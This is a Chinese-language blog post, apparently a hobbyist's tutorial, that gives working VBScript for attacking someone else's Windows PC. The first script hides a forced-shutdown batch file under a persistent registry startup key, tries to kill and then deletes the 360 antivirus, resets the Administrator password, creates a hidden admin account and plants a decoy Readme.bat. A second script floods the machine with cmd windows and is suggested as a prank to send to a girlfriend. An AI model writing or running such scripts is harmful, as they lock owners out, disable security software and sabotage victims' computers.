VBS菜鸟实战

 

无聊的每一天，看**网站的时候，竟意外发现我的电脑中毒自动关机了，NND，真是第一次，哥上论坛泡了一天天，渐渐有点懂了。。于是，我也来玩玩

首先，创建脚本

set a=createobject("wscript.shell") path="HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnce/"

a.run "cmd /c echo shutdown -s -f -t 30 > c:/SYSTEM32.bat",vbhide

a.run "cmd /c attrib  c:/SYSTEM321.bat +h",vbhide

var=a.regwrite(path&"*Sougouupdate","c:/SYSTEM32.bat")

目的是创建开机启动项，很阴险地放进C盘，并命名为SYSTEM32.BAT，然后利用attrib把属性修改为隐藏，SYSTEM32.BAT里面内容为：

shutdown -s -f -t 30 即开机后30秒就自动关机，NND，给人家一个机会，放到Runonce里面，对于太令人讨厌的38就在Run里面也放一个，再把30改为0，靠，让他永远开机就关机，爽！就算发现了，他会修改注册表，可惜，RUN里面的键值是没法删除的，除非进入保护模式，好吧，哥在键值前面加了一个*，就算你进入保护模式，也一样运行一次，叫你关机就关机！接着，令人讨厌的是，基本都TMD装了360，脚本一运行就会提示,CA,改不了注册表，

在网上搜了一下，必须关掉360，cmd /c taskkill /f /im 360Safe.exe,加到脚本，靠，竟然还关闭不了，没办法，现在的防毒软件是很好滴，一般的小伎俩根本不行。换一招，跳过这个或许失败的句子，脚本头上添加On Error Resume Next ,然后让他电脑重新启动下，换到另一个用户，于是，继续脚本：

a.run "cmd /c net user Administrator caonima"，vbhide一般默认装的系统里面管理员名都是Administrator了，碰碰运气吧，把他密码改为caonima ,让他登陆不了，然后就会进第二个用户，即下面添加的LC，激活另一个管理员:

a.run "cmd /c net user LC /add",vbhide,再将添加的用户提权为管理员：

a.run "cmd /c net localgroup Administrators LC /add",vbhide于是，LC管理员添加了,再激活它，a.run "cmd /c net user LC /active:yes",vbhide,完成之后，直接让他注销机子，a.run "cmd /c logoff",回到登陆界面，当他试了好几次进不了Administrator后，会意外地发现LC不用密码就进去了，好！中招！新用户也是管理员，我们需要在他进入新用户之前完成一些工作，在即将进入的用户桌面上创建一个bat脚本,命名为Readme,骗死他，就是在logoff前再写几句代码，NND，直接把360 给删掉，

a.run "cmd /c echo set a=createobject(""scripting.filesystemobject"") > c:/system.vbs",vbhide

a.run "cmd /c echo a.deletefolder(""c:/Program Files/360"") >> c:/system.vbs"

当system.vbs执行后，360就没有任何提示的消失了，哦也，但是要让他执行，所以，再将system.vbs放到将要显示的lc桌面上：set b=CreateObject("Scripting.Filesystemobject") 

if (b.folderexists("C:/Documents and Settings/LC/桌面")) then

b.copyfile  "c:/system.vbs","C:/Documents and Settings/LC/桌面/system.vbs"

else

folertemp=b.createfolder("C:/Documents and Settings/LC/桌面")

b.copyfile  "c:/system.vbs","C:/Documents and Settings/LC/桌面/"

end if这样，将会出现在lc的桌面上，再将属性设置为隐藏，创建一个新的bat脚本Readme运行它,

a.run "cmd /c attrib c:/Documents and Settings/lc/桌面/system.vbs +h",vbhide;

a.run "cmd /c echo call c:/Documents and Settings/lc/system.vbs > c:/Ducuments and Settings/lc/桌面/Readme.bat",OK,完成了，下面享受他的纠结了！

 

 

上次写了一个超级简单的脚本，高手看了会笑滴，把一位好童鞋给气的关机了，诶，辜负了她的信任啊！代码如下：

start.vbs：

set a=createobject("wscript.shell")

a.run "cmd /c echo  @echo off > sendm.bat"

a.run "cmd /c echo  @echo **********对不起，我爱你********** >> sendm.bat"

a.run "cmd /c echo call sendm.bat " '注释

for i=0 to 500

a.run "cmd /c sendm.bat"

next

自己576M内存的虚拟机上用50亲测了下，cpu100%,内存耗用不大。。。。试试啊

 

其实吧，不用强制关机的，因为运行完了后，所有窗口自动关闭了，只是，要一点时间而已。。。那是因为最后一刻改了一句，a.run "cmd /c echo call sendm.bat  >> sendm.bat"

如果将这一句换掉上面的注释句，呵呵，那场面相当壮观啊！！有兴趣的哥们试试，发给你女朋友，爱死你了